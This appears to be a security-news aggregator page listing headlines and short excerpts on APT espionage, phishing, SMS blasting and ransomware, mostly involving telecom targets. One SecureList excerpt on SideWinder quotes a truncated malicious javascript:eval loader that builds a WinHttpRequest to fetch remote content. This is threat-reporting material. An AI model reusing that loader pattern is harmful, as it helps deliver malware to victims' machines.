Phishing, Technology and Telecommunications

Storm-2372 used the device code phishing technique since August 2024

Security Affairs

FEBRUARY 16, 2025

Russia-linked group Storm-2372 used the device code phishing technique since Aug 2024 to steal login tokens from governments, NGOs, and industries. ” Device code phishing attacks exploit authentication flows to steal tokens, granting attackers access to accounts and data. . ” continues the report.

Phishing

Phishing Authentication Telecommunications Accountability

Thai police arrested Chinese hackers involved in SMS blaster attacks

Security Affairs

NOVEMBER 25, 2024

“This “SMS blasting” attack relies on using technology that impersonates cellular base stations and is capable of transmitting thousands of messages to devices within a close geographical radius.” ” first reported TechCrunch. The equipment sent nearly 1 million fraudulent messages in 3 days.

Mobile

Mobile Scams Technology Telecommunications

Australia, Canada, New Zealand, and the U.S. warn of PRC-linked cyber espionage targeting telecom networks

Security Affairs

DECEMBER 4, 2024

Organizations should adopt secure password storage, phishing-resistant MFA, session token limits, and Role-Based Access Control (RBAC). The US government’s continued investigation into the People’s Republic of China (PRC) targeting of commercial telecommunications infrastructure has revealed a broad and significant cyber espionage campaign.”

Telecommunications

Telecommunications Government Mobile Cyber threats

News alert: CyTwist launches threat detection engine tuned to identify AI-driven malware in minutes

The Last Watchdog

JANUARY 7, 2025

AI-generated phishing emails, adaptive botnets, and automated reconnaissance tools are now common components of cybercriminal tactics. These technologies bypass signature-based defenses and mimic legitimate behavior, making detection more challenging.

Threat Detection

Threat Detection Engineering Malware Artificial Intelligence

Americans urged to use encrypted messaging after large, ongoing cyberattack

Malwarebytes

DECEMBER 5, 2024

Speaking to Reuters , a senior US official said the attack telecommunications infrastructure was broad and that the hacking was still ongoing. The state-sponsored actor behind the attack is an Advanced Persistent Threat (APT) group known as Salt Typhoon, believed to be tied to the People’s Republic of China (PRC).

Encryption

Encryption Identity Theft Media Telecommunications

Voice Phishers Targeting Corporate VPNs

Krebs on Security

AUGUST 19, 2020

The COVID-19 epidemic has brought a wave of email phishing attacks that try to trick work-at-home employees into giving away credentials needed to remotely access their employers’ networks. For now at least, they appear to be focusing primarily on companies in the financial, telecommunications and social media industries.

Phishing

Phishing VPN Social Engineering Media

Microsoft: Russian-Linked Hackers Using 'Device Code Phishing' to Hijack Accounts

The Hacker News

FEBRUARY 14, 2025

The attacks have targeted government, non-governmental organizations (NGOs), information technology (IT) services and technology, defense, telecommunications, health, higher education, and energy/oil and gas

Telecommunications

Telecommunications Accountability Phishing Education

Privacy Roundup: Week 12 of Year 2025

Security Boulevard

MARCH 24, 2025

Surveillance Tech in the News This section covers surveillance technology and methods in the news. but given the Salt Typhoon breach and the apparent lackluster security practices and culture at just about every American telecommunications company, this was too interesting to ignore. They also have appeared to partner with Proton.

Surveillance

Surveillance Telecommunications Malware Data breaches

Phishing campaign goes old school, dusts off Morse code

Malwarebytes

AUGUST 13, 2021

In an extensive report about a phishing campaign , the Microsoft 365 Defender Threat Intelligence Team describes a number of encoding techniques that were deployed by the phishers. While Morse code may seem like ancient communication technology to some, it does have a few practical uses in the modern world. The campaign.

Phishing

Phishing Passwords Computers and Electronics Telecommunications

Microsoft details new sophisticated spear-phishing attacks from NOBELIUM

Security Affairs

MAY 28, 2021

NOBELIUM focuses on government organizations, non-government organizations (NGOs), think tanks, military, IT service providers, health technology and research, and telecommunications providers. The phishing campaign detected by MSTIC leveraged the Google Firebase platform to provide an ISO file containing the malicious code.

Phishing

Phishing Threat Detection Telecommunications Malware

New spear phishing campaign targets Russian dissidents

Malwarebytes

MARCH 29, 2022

The spear phishing emails are warning people that use websites, social networks, instant messengers and VPN services that have been banned by the Russian Government and that criminal charges will be laid. Spear phishing as the main initial infection vector. Spear phishing as the main initial infection vector. Victimology.

Phishing

Phishing Education Telecommunications Technology

Security Affairs newsletter Round 500 by Pierluigi Paganini – INTERNATIONAL EDITION

Security Affairs

DECEMBER 1, 2024

Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press.

Cybercrime

Cybercrime Firewall Social Engineering Ransomware

SideWinder targets the maritime and nuclear sectors with an updated toolset

SecureList

MARCH 10, 2025

Infection flow The attacker sends spear-phishing emails with a DOCX file attached. The following industries were also affected: telecommunication, consulting, IT service companies, real estate agencies, and hotels. Furthermore, we observed attacks against entities associated with nuclear energy.

Energy and Utilities

Energy and Utilities Malware Government Phishing

GUEST ESSAY: Preparing for the dire cybersecurity consequences of Russia’s invasion of Ukraine

The Last Watchdog

APRIL 13, 2022

The Russian government, military, and intelligence service may wish to achieve some operational effect, for example, disrupting the power grid or interfering with telecommunications infrastructure, which may be part of a larger war plan. Educate your employees on threats and risks such as phishing and malware.

Cybersecurity

Cybersecurity Cybercrime Education Government

Russia-linked Nobelium APT targets orgs in the global IT supply chain

Security Affairs

OCTOBER 25, 2021

NOBELIUM focuses on government organizations, non-government organizations (NGOs), think tanks, military, IT service providers, health technology and research, and telecommunications providers. ” states Microsoft.

Telecommunications

Telecommunications Technology Hacking Malware

Security Affairs newsletter Round 511 by Pierluigi Paganini – INTERNATIONAL EDITION

Security Affairs

FEBRUARY 15, 2025

custody in exchange for Marc Fogel North Korea-linked APT Emerald Sleet is using a new tactic U.S.

Spyware

Spyware Firewall Artificial Intelligence Malware

Russian Sandworm APT impersonates Ukrainian telcos to deliver malware

Security Affairs

SEPTEMBER 21, 2022

Russia-linked APT group Sandworm has been observed impersonating telecommunication providers to target Ukrainian entities with malware. Russia-linked cyberespionage group Sandworm has been observed impersonating telecommunication providers to target Ukrainian entities with malware. ” reads the report published by Recorded Future.

Malware

Malware Telecommunications DNS Hacking

FIN11 gang started deploying ransomware to monetize its operations

Security Affairs

OCTOBER 18, 2020

Since August, FIN11 started targeting organizations in many industries, including defense, energy, finance, healthcare, legal, pharmaceutical, telecommunications, technology, and transportation. Researchers from FireEye’s Mandiant observed FIN11 hackers using spear-phishing messages distributing a malware downloader dubbed FRIENDSPEAK.

Ransomware

Ransomware Malware Telecommunications Advertising

Nobelium APT targets French orgs, French ANSSI agency warns

Security Affairs

DECEMBER 6, 2021

NOBELIUM focuses on government organizations, non-government organizations (NGOs), think tanks, military, IT service providers, health technology and research, and telecommunications providers. “ANSSI has observed a number of phishing campaigns directed against French entities since February 2021.

Phishing

Phishing Telecommunications Government Accountability

Beyond the Surface: the evolution and expansion of the SideWinder APT group

SecureList

OCTOBER 15, 2024

SideWinder’s most recent campaign schema Infection vectors The SideWinder attack chain typically starts with a spear-phishing email with an attachment, usually a Microsoft OOXML document (DOCX or XLSX) or a ZIP archive, which in turn contains a malicious LNK file. javascript:eval("v=ActiveXObject;x=new v("WinHttp.WinHttpRequest.5.1");x.open("GET",

Malware

Malware Encryption Architecture Phishing

Happy 13th Birthday, KrebsOnSecurity!

Krebs on Security

DECEMBER 29, 2022

Faced with an increasing brain drain of smart people fleeing the country, Russia floats a new strategy to address a worsening shortage of qualified information technology experts: Forcing tech-savvy people within the nation’s prison population to perform low-cost IT work for domestic companies. Uber blames LAPSUS$ for the intrusion.

Cryptocurrency

Cryptocurrency Cybercrime Computers and Electronics Scams

What are Common Types of Social Engineering Attacks?

eSecurity Planet

JULY 29, 2021

Social engineering can manifest itself across a wide range of cybersecurity attacks: Phishing Smishing Vishing Whaling Pharming Baiting Pretexting Scareware Deepfakes. Phishing is a broad category of social engineering attacks that specifically target most businesses’ primary mode of communication: email. Pretexting.

Social Engineering

Social Engineering Engineering Phishing DNS

Canada Releases 2025 National Cyber Security Strategy

SecureWorld News

FEBRUARY 12, 2025

Technology is an integral part of our lives that has become increasingly linked to critical infrastructure and the services we rely on daily like our hospitals, transit systems, energy suppliers, and telecommunications systems," said a press release from Public Safety Canada.

Cyber threats

Cyber threats Cybercrime Cybersecurity Government

What Is Exposure Management and Why Does It Matter?

Security Boulevard

MARCH 17, 2025

Cybersecurity and Infrastructure Security Agency reveals that 90% of initial access to critical infrastructure comes via identity compromise like phishing, compromised passwords, identity systems and misconfigurations. As new technologies are regularly adopted, they come accompanied by new threats. A report from the U.S.

Risk

Risk Mobile Technology IoT

Sudden Rise in Email Based Ransomware Attacks

SecureWorld News

JULY 1, 2020

Phishing emails are increasingly attempting to launch ransomware attacks against organizations. These verticals include education and manufacturing followed by transportation, entertainment, technology, healthcare, and telecommunications.". This includes a newly discovered family, or strain of ransomware, called Avaddon.

Ransomware

Ransomware Manufacturing Telecommunications Healthcare

Scanning for Flaws, Scoring for Security

Krebs on Security

DECEMBER 12, 2018

Mike Lloyd , chief technology officer at RedSeal , was quoted as saying a score “taken from the outside looking in is similar to rating the fire risk to a building based on a photograph from across the street.” The October analysis by the Chamber and FICO gives U.S. businesses an overall score of 687 on a scale of 300-850.

Cyber Risk

Cyber Risk Energy and Utilities Risk Marketing

Operation Lyrebird: Group-IB assists INTERPOL in identifying suspect behind numerous cybercrimes worldwide

Security Affairs

JULY 6, 2021

According to Group-IB’s Threat Intelligence team, the suspect, dubbed Dr HeX by Group-IB based on one of the nicknames that he used, has been active since at least 2009 and is responsible for a number of cybercrimes, including phishing, defacing, malware development, fraud, and carding that resulted in thousands of unsuspecting victims.

Cybercrime

Cybercrime Phishing Banking Telecommunications

Google TAG warns of Russia-linked APT groups targeting Ukraine

Security Affairs

APRIL 20, 2023

The researchers from Google TAG are warning of Russia-linked threat actors targeting Ukraine with phishing campaigns. Russia-linked threat actors launched large-volume phishing campaigns against hundreds of users in Ukraine to gather intelligence and aimed at spreading disinformation, states Google’s Threat Analysis Group (TAG).

Phishing

Phishing Education Accountability Malware

Spotlight on Cybersecurity Leaders: Dr. Cheryl Cooper

SecureWorld News

MARCH 24, 2022

Answer: The decision to pursue a career in cybersecurity came easy to me, as I was tenured as a technology and telecommunications professional for 15 years. As a military veteran of the United States Navy, I had a foundational background working in telecommunications. I enjoyed troubleshooting systems and solving problems.

Cybersecurity

Cybersecurity Telecommunications Mobile IoT

Threat Spotlight: Credential Theft vs. Admin Control—Two Devastating Paths to VPN Exploitation

Digital Shadows

MARCH 17, 2025

The ransomware targets unpatched internet-facing servers, impacting systems across 70+ countries in sectors like critical infrastructure, health care, governments, education, technology, manufacturing, and small- to medium-sized businesses. 3 Whats Behind its Enduring Popularity? What makes CVE-2018-13379 so dangerous is its stickiness.

VPN

VPN Authentication Ransomware Risk

Group-IB presents its annual report on global threats to stability in cyberspace

Security Affairs

NOVEMBER 29, 2019

The group’s distinctive features are the high quality of their phishing attacks and the use of legitimate services, which makes it very difficult to detect its malicious activity in companies’ infrastructures. The most common objective of such attacks is cyberespionage and disruption of major telecommunications companies’ work.

Banking

Banking Telecommunications Marketing Internet

2024 Cybersecurity Laws & Regulations

eSecurity Planet

SEPTEMBER 21, 2024

Recent updates to HIPAA regulations may address new technologies and evolving threats in the healthcare industry. Recent amendments to the CFAA may include updates to address new cybercrime techniques and technological advancements. This includes administrative, physical, and technical safeguards like encryption and access controls.

Cybersecurity

Cybersecurity Computers and Electronics Cyber threats Healthcare

Russia-linked APT8 exploited Outlook zero-day to target European NATO members

Security Affairs

DECEMBER 7, 2023

Most of the APT28s’ campaigns leveraged spear-phishing and malware-based attacks. The group operates out of military unity 26165 of the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS). The vulnerability is a Microsoft Outlook spoofing vulnerability that can lead to an authentication bypass.

Government

Government Telecommunications Accountability Phishing

CISA: Top Vulnerabilities Actively Exploited by China Hackers

SecureWorld News

OCTOBER 6, 2022

Utilize phishing-resistant multi-factor authentication whenever possible. PRC state-sponsored cyber actors continue to exploit known vulnerabilities and use publicly available tools to target networks of interest. The advisory provides six mitigations: "Update and patch systems as soon as possible.

Passwords

Passwords Telecommunications Government Risk

News alert: AI-powered web scrapers from Oxylabs are breaking new ground in fraud detection

The Last Watchdog

OCTOBER 20, 2023

“Enterprises in the finance, banking, and telecommunications sectors are the most susceptible to online fraud, but it can happen to any company,” said Vaidotas Sedys , Head of Risk Management at Oxylabs. Cloud technologies also play an important role in the latest anti-fraud developments. and bypass flagging or bans.

Artificial Intelligence

Artificial Intelligence Identity Theft Telecommunications Big data

Documents Unsealed: North Korea's Global Hacking Campaign

SecureWorld News

FEBRUARY 18, 2021

billion from banks in Vietnam, Bangladesh, Taiwan, Mexico, Malta, and Africa by hacking the banks' computer networks and sending fraudulent Society for Worldwide Interbank Financial Telecommunication (SWIFT) messages. The hackers employed false and fraudulent personas when they sent spear-phishing messages to victims. D'Ambrosio.

Hacking

Hacking Cryptocurrency Computers and Electronics Banking

Octo Tempest cybercriminal group is "a growing concern"—Microsoft

Malwarebytes

OCTOBER 27, 2023

” Since then the group has expanded its range of activities to include targeting organizations providing cable telecommunications, email, and tech services, and partnering with the ALPHV/BlackCat ransomware group. The group includes members with extensive technical knowledge and multiple hand-on-keyboard operators.

Social Engineering

Social Engineering Engineering Ransomware Backups

The Future of Data Protection Begins at GITEX 2019

Thales Cloud Protection & Licensing

OCTOBER 3, 2019

Several months later, I learned about how Dragos had spotted a new threat group called “HEXANE” targeting oil and gas companies in the Middle East as well as telecommunications providers in the Middle East, Central Asia and Africa. Not all employees are familiar with phishing and other digital threats, for instance.

Telecommunications

Telecommunications Encryption Software Cyber Attacks

Cybersecurity awareness: Train your employees and reduce cyber threats

IT Security Guru

DECEMBER 1, 2022

Phishing attacks can be minimized by knowing the key indicators of a phishing attempt and how to address them. Furthermore, as AI and ML technology evolves and used by bad actors, these awareness campaigns can help people spot deepfake signs and address them adequately. He is also a writer for Bora.

Cyber threats

Cyber threats Cybersecurity Education Risk

A Deep Dive on the Recent Widespread DNS Hijacking Attacks

Krebs on Security

FEBRUARY 18, 2019

mail.cyta.com.cy: Cyta telecommunications and Internet provider, Cyprus. Woodcock said domain records for the targeted Middle East TLDs it managed were altered after the DNSpionage hackers phished credentials that Key-Systems uses to make domain changes for their clients. webmail.finance.gov.lb: email for Lebanon Ministry of Finance.

DNS

DNS Internet Internet Government

NATO and the EU formally condemned Russia-linked APT28 cyber espionage

Security Affairs

MAY 5, 2024

Most of the APT28s’ campaigns leveraged spear-phishing and malware-based attacks. The group operates out of military unity 26165 of the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS).

Government

Government Accountability Cyber Attacks Telecommunications

News alert: Infobip identifies five typical security challenges impacting mobile users

The Last Watchdog

OCTOBER 16, 2023

Orange and Infobip/Anam therefore took advantage of their joint expertise in telecommunications security to develop a robust A2P SMS protect solution, which identifies current and emerging risks, and proactively safeguards telcos, businesses, and end-users on most channels.”

Mobile

Mobile Firewall Telecommunications Marketing

OilRig APT group: the evolution of attack techniques over time

Security Affairs

AUGUST 7, 2019

The group has targeted a variety of industries, including financial, government, energy, chemical, and telecommunications, and has largely focused its operations within the Middle East. Indeed during the group_a, the main observed delivery techniques where about Phishing (rif.T1193) and Valid Accounts (rif.T1078).

Computers and Electronics

Computers and Electronics Penetration Testing DNS Phishing

Becoming an MSSP: Tools, Services & Tips for Managed Security Services

eSecurity Planet

FEBRUARY 9, 2022

According to Jay McBain, an analyst at Forrester Research, spending on IT and telecommunications will be worth about $7 trillion by 2030. 54% of ESG respondents stated that the primary drivers behind technology spending were strengthening of cybersecurity and improving resiliency against attacks. Competition is fierce.

Backups

Backups Firewall DDOS Antivirus

Storm-2372 used the device code phishing technique since August 2024

Thai police arrested Chinese hackers involved in SMS blaster attacks

Trending Sources

Australia, Canada, New Zealand, and the U.S. warn of PRC-linked cyber espionage targeting telecom networks

News alert: CyTwist launches threat detection engine tuned to identify AI-driven malware in minutes

Americans urged to use encrypted messaging after large, ongoing cyberattack

Voice Phishers Targeting Corporate VPNs

Microsoft: Russian-Linked Hackers Using 'Device Code Phishing' to Hijack Accounts

Privacy Roundup: Week 12 of Year 2025

Phishing campaign goes old school, dusts off Morse code

Microsoft details new sophisticated spear-phishing attacks from NOBELIUM

New spear phishing campaign targets Russian dissidents

Security Affairs newsletter Round 500 by Pierluigi Paganini – INTERNATIONAL EDITION

SideWinder targets the maritime and nuclear sectors with an updated toolset

GUEST ESSAY: Preparing for the dire cybersecurity consequences of Russia’s invasion of Ukraine

Russia-linked Nobelium APT targets orgs in the global IT supply chain

Security Affairs newsletter Round 511 by Pierluigi Paganini – INTERNATIONAL EDITION

Russian Sandworm APT impersonates Ukrainian telcos to deliver malware

FIN11 gang started deploying ransomware to monetize its operations

Nobelium APT targets French orgs, French ANSSI agency warns

Beyond the Surface: the evolution and expansion of the SideWinder APT group

Happy 13th Birthday, KrebsOnSecurity!

What are Common Types of Social Engineering Attacks?

Canada Releases 2025 National Cyber Security Strategy

What Is Exposure Management and Why Does It Matter?

Sudden Rise in Email Based Ransomware Attacks

Scanning for Flaws, Scoring for Security

Operation Lyrebird: Group-IB assists INTERPOL in identifying suspect behind numerous cybercrimes worldwide

Google TAG warns of Russia-linked APT groups targeting Ukraine

Spotlight on Cybersecurity Leaders: Dr. Cheryl Cooper

Threat Spotlight: Credential Theft vs. Admin Control—Two Devastating Paths to VPN Exploitation

Group-IB presents its annual report on global threats to stability in cyberspace

2024 Cybersecurity Laws & Regulations

Russia-linked APT8 exploited Outlook zero-day to target European NATO members

CISA: Top Vulnerabilities Actively Exploited by China Hackers

News alert: AI-powered web scrapers from Oxylabs are breaking new ground in fraud detection

Documents Unsealed: North Korea's Global Hacking Campaign

Octo Tempest cybercriminal group is "a growing concern"—Microsoft

The Future of Data Protection Begins at GITEX 2019

Cybersecurity awareness: Train your employees and reduce cyber threats

A Deep Dive on the Recent Widespread DNS Hijacking Attacks

NATO and the EU formally condemned Russia-linked APT28 cyber espionage

News alert: Infobip identifies five typical security challenges impacting mobile users

OilRig APT group: the evolution of attack techniques over time

Becoming an MSSP: Tools, Services & Tips for Managed Security Services

Stay Connected